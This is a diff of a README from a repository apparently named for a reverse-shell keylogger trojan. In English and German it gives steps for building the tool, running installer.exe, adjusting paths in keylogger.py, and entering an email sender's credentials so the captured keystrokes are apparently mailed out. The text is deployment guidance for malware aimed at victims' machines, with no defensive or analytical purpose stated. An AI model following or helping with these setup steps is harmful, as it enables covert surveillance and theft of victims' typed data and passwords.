eliasd-code/reverse-shell_keylogger_trojan/README.md

 8. Start installer.exe
 ATTENTION!
 You have to go to "email_sender.py" before you build all this and enter your sender and recipient email as well as the password for the sender. should be a matter of course

 DE: INSTALLATION:
-die installation muss auf windows erfolgen!
+Die installation muss auf windows erfolgen!
+Die Pfade müssen in der "keylogger.py" und "email_sender.py" angepasst werden!
 1. Die scripts alle in einem ordner lassen
 2. als erstes das builder_master.py per "python [DATEI] build" bauen
 3. in den Build Ordner gehen und den win.exe ordner zu "master" umbenennen